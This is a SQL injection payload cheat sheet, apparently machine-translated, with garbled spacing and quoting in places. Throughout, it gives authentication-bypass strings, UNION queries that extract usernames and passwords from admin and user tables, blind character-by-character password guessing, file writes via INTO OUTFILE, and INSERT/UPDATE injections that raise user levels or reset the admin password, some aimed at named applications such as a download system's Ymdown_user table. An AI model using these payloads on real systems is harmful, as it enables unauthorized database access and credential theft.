' Or 1=1
' or ' 1=1
'/*
'%23
' and password= ' Mypass
Id=-1 Union Select 1,1,1
Id=-1 Union Select char (), char (), char (97)
Id=1 Union select 1,1,1 from members
Id=1 Union select 1,1,1 from admin
Id=1 Union select 1,1,1 from user
Userid=1 and Password=mypass
Userid=1 and Mid (password,3,1) =char (112)
Userid=1 and Mid (password,4,1) =char (97)
and Ord (Mid (password,3,1)) >111 (the ORD function is convenient here because it returns an integer)
' and length (password) = ' 6 (Probe password length)
' and Left (password,1) = ' m
' and Left (password,2) = ' my
.............................. and so on
' Union select 1,username,password from user/*
' Union select 1,username,password from user/*
= ' Union select 1,username,password from user/* (can be 1 or = after directly with)
99999 ' Union select 1,username,password from user/*
' Into outfile ' c:/file.txt (export file)
= ' or 1=1 into outfile ' C:/file.txt
1 ' union select 1,username,password from user into outfile ' c:/user.txt
SELECT Password from admins WHERE login= ' John ' into DumpFile '/path/to/site/file.txt '
Id= ' Union select 1,username,password from user into outfile
Id=-1 Union Select 1,database (), version () (apply the query flexibly)
Common test statements for query conditions:
SELECT * FROM table WHERE 1=1
SELECT * FROM table WHERE ' uuu ' = ' UUU '
SELECT * FROM table WHERE 1<>2
SELECT * FROM table WHERE 3>2
SELECT * FROM table WHERE 2<3
SELECT * FROM table WHERE 1
SELECT * FROM table WHERE 1+1
SELECT * FROM table WHERE 1--1
SELECT * FROM table WHERE ISNULL (NULL)
SELECT * FROM table WHERE ISNULL (COT (0))
SELECT * FROM table WHERE 1 IS NOT NULL
SELECT * FROM table WHERE null is NULL
SELECT * FROM Table WHERE 2 BETWEEN 1 and 3
SELECT * FROM table WHERE ' B ' BETWEEN ' A ' and ' C '
SELECT * FROM Table WHERE 2 in (0,1,2)
SELECT * FROM table WHERE CASE WHEN 1>0 THEN 1 END
For example: Night Cat Download System version 1.0
Id=1 Union Select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
Union Select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user
Union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where id=1
id=10000 Union Select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where id=1 and groupid=1
Union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where id=1 (replace, find password)
Union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where Id=1 and Ord (Mid (password,1,1)) =49 (verify first-digit password)
Union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where Id=1 and Ord (Mid (password,2,1)) =50 (second place)
Union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where Id=1 and Ord (Mid (password,3,1)) =51
..................................................................
Example 2: Gray trajectory Transformation ID for testing (meteor)
Union%20 (Select%20allowsmilies,public,userid, ' 0000-0-0 ', User (), version ()%20from%20calendar_events%20where% 20eventid%20=%2013)%20order%20by%20eventdate
Union%20 (Select%20allowsmilies,public,userid, ' 0000-0-0 ', Pass (), version ()%20from%20calendar_events%20where% 20eventid%20=%2010)%20order%20by%20eventdate
The constructed statement:
Select Allowsmilies,public,userid,eventdate,event,subject from calendar_events WHERE EventID = 1 Union (select 1,1,1,1,1 , 1,1 from user where userid=1)
Select Allowsmilies,public,userid,eventdate,event,subject from calendar_events WHERE EventID = 1 Union (select 1,1,1,1, Username,password from user where userid=1)
Union%20 (select%201,0,2, ' 1999-01-01 ', ' a ', password%20from%20user%20where%20userid%20=%205)%20order%20by% 20eventdate
Union%20 (select%201,0,12695, ' 1999-01-01 ', ' a ', password%20from%20user%20where%20userid=13465)%20order%20by% 20eventdate
Union%20 (select%201,0,12695, ' 1999-01-01 ', ' a ', userid%20from%20user%20where%20username= ' Sandflee ')%20order%20by% 20eventdate (check the ID of the sand)
(SELECT A from table_name WHERE a=10 and B=1 order by a LIMIT 10)
SELECT * FROM article WHERE articleid= ' $id ' UNION SELECT * from ... (when the columns of both tables line up in the same way, this can be submitted directly)
SELECT * FROM article WHERE articleid= ' $id ' UNION select 1,1,1,1,1,1,1 ... (when the columns do not line up)
Special tricks: in forms, search fields and similar inputs, enter:
“___”
“.__ ”
“%
% ' ORDER by articleid/*
% ' ORDER by articleid#
__ ' ORDER BY articleid/*
__ ' ORDER BY articleid#
$command = "dir c:\"; system ($command);
SELECT * from article WHERE articleid= ' $id '
SELECT * from article WHERE articleid= $id
1 ' and 1=2 union SELECT * from user where userid=1/* the statement becomes
(SELECT * from article where articleid= ' 1 "and 1=2 Union SELECT * from user WHERE userid=1/* ')
1 and 1=2 Union SELECT * from user where userid=1
Statement forms: create a database, then insert:
CREATE DATABASE ' injection '
CREATE TABLE ' user ' (
' userid ' int (one) not NULL auto_increment,
' username ' varchar not NULL default ',
' Password ' varchar not NULL default ',
PRIMARY KEY (' userid ')
) ;
INSERT into ' user ' VALUES (1, ' Swap ', ' mypass ');
Insert used for user registration:
INSERT into ' user ' (userid, username, password, homepage, userlevel) VALUES (', ' $username ', ' $PASSW Ord ', ' $homepage ', ' 1 ');
INSERT into membres (login,password,nom,email,userlevel) VALUES (' $login ', ' $pass ', ' $nom ', ' $email ', ' 1 ');
INSERT into membres (login,password,nom,email,userlevel) VALUES (', ', ', ', ', ', ', ', ', ' 3 ') # ', ' 1 ')
INSERT into membres SET login= ' $login ', password= ' $pass ', nom= ' $nom ', email= ' $email ';
INSERT into membres SET login= ', password= ', nom= ', userlevel= ' 3 ', email= '
' inserts into membres VALUES (' $id ', ' $login ', ' $pass ', ' $nom ', ' $email ', ' 1 ');
Update user set password= ' $password ', homepage= ' $homepage ' WHERE id= ' $id '
UPDATE user set password= ' MD5 (mypass) ' W Here username= ' admin ' #) ', homepage= ' $homepage ' WHERE id= ' $id '
' UPDATE membres SET password= ' $pass ', nom= ' $nom ', Email= ' $email ' WHERE id= ' $id ';
Update membres set password= ' [Pass] ', nom= ', userlevel= ' 3 ', email= ' WHERE id= ' [id] '
UPDATE news SET Votes=votes +1, score=score+ $note WHERE idnews= ' $id ';
Built-in functions:
DATABASE ()
USER ()
System_user ()
Session_user ()
Current_User ()
For example:
UPDATE article Set title= $title WHERE articleid=1 (the same statement with each function substituted):
UPDATE article SET title=database () where id=1
# writes the current database name into the title field
UPDATE article set Title=user () where id=1
# writes the current MySQL user name into the title field
Update article set Title=system_user () where id=1
# writes the current MySQL user name into the title field
Update article SET title=session_user () WHERE id=1
# writes the current MySQL user name into the title field
UPDATE article SET title=current_user () WHERE id=1
# writes the user name that the current session was authenticated as into the title field
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
$req = "SELECT * from membres WHERE name is $search% ' order by name";
SELECT * from membres WHERE name like ' percent ' order by uid#% ' ORDER by name
SELECT * from membres WHERE name like ' percent ' order by uid#% ' ORDER by name
SELECT uid from admins WHERE login= ' or ' a ' = ' a ' and password= ' or ' a ' = ' a ' (classic)
SELECT uid from admins WHERE login= ' OR admin_level=1# ' and password= '
SELECT * FROM table WHERE msg like '%hop '
SELECT uid from membres WHERE login= ' Bob ' and password like ' a% ' and password= '
SELECT * from membres WHERE name like ' percent ' order by uid#% ' ORDER by name